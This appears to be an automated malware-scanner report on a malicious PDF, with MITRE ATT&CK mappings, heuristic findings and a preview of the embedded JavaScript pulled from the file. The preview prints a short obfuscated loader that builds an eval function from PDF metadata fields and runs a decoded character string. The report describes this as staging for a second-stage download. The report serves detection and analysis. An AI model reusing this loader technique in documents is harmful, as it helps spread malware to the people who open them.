MALICIOUS
114
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF sample contains embedded JavaScript that is obfuscated but appears to be designed to download and execute a second-stage payload. The JavaScript uses String.fromCharCode and dynamic function calls, consistent with exploit techniques. The ML classifier strongly indicates maliciousness, and the heuristics point to a known JavaScript exploit cluster within PDFs.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 3
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.jsa1ad758dc851f233f7acaaf3eb29d1f0c2e61eac4c9904eb32b45cf2e1fdc7e4 |
pdf-javascript-stream | PDF /JS object 1 at offset 0x11C | 339 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var w = 4;
var ivcsw = this.producer;
var skidw=function(){return {e:this}}().e;
vwunh=skidw[this.subject];
kxoeq=vwunh(this.title);
ivcsw = ivcsw.replace(/t/g,'2');
aaecj = vwunh('['+ivcsw+']');
var s = '';
for (i = 0; i < aaecj.length; i++) {
.eqjbf = aaecj[i];
.s += kxoeq(eqjbf);
}
vwunh(s);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.